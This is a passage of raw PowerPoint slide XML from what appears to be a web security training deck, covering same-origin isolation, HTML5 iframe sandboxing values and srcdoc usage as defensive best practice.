      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626114102"/>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SOP and Basic Content Isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1745673"/>
            <a:ext cx="8229600" cy="4426527"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>https://news.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>https://comments.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>https://accounts.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115946995"/>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442" y="457200"/>
            <a:ext cx="5435357" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-1"/>
            <a:ext cx="2695715" cy="1094872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355599" y="2810156"/>
            <a:ext cx="8229600" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>The content is assigned a separate and unique origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Scripts are not executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Forms cannot be submitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Navigation of external contexts is not allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Popups are not allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Plugin content, such as Flash or Java, is not executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Fullscreen capabilities are not available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Autoplay for multimedia content is not available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="355599" y="1514260"/>
            <a:ext cx="8331201" cy="1006027"/>
            <a:chOff x="4572000" y="2129832"/>
            <a:chExt cx="8716754" cy="1006027"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Content Placeholder 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2129832"/>
              <a:ext cx="8716754" cy="338554"/>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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iFrame</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Sandboxing (HTML5)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Content Placeholder 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2474139"/>
              <a:ext cx="8716754" cy="661720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ECE9E7"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="300"/>
                </a:spcAft>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="365760" indent="-182880" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="300"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" charset="2"/>
                <a:buChar char="ü"/>
                <a:defRPr sz="1600" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="7A6C62"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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buFont typeface="Wingdings" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>demo_iframe_sandbox.jsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>" sandbox=""&gt;&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1">
                <a:buFont typeface="Wingdings" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Allow-same-origin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, allow-top-navigation, allow-forms, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>allow-scripts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2660437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a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0"/>
              <a:t> Sandboxing Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2587959"/>
          <a:ext cx="8229600" cy="2743200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2942823">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5286777">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="9900FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="9900FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0"/>
                        <a:t>"“ (empty)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0"/>
                        <a:t>Applies all restrictions below</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IE" b="1" dirty="0"/>
                        <a:t>allow-same-origin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Allows the iframe content to be treated as being from the same origin as the containing document</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IE" b="1"/>
                        <a:t>allow-top-navigation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Allows the iframe content to navigate (load) content from the containing document</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" b="1"/>
                        <a:t>allow-forms</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE"/>
                        <a:t>Allows form submission</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" b="1" dirty="0"/>
                        <a:t>allow-scripts</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0"/>
                        <a:t>Allows script execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-126124" y="1562428"/>
            <a:ext cx="8198069" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="demo.htm" sandbox=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="ctr"/>
            <a:endParaRPr lang="en-IE" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937460659"/>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iFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Sandboxing with srcdoc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355599" y="2507021"/>
            <a:ext cx="8229600" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> does not work in IE, so this is best used for internal tools. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://caniuse.com/#search=srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Sandbox isn’t supported in IE 9 and below, so it’s almost for the better that you can’t rely on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  in IE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>You should still XSS-sanitize this content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Avoid using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>srcdoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> when SEO is a factor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="355599" y="1514260"/>
            <a:ext cx="8331201" cy="682861"/>
            <a:chOff x="4572000" y="2129832"/>
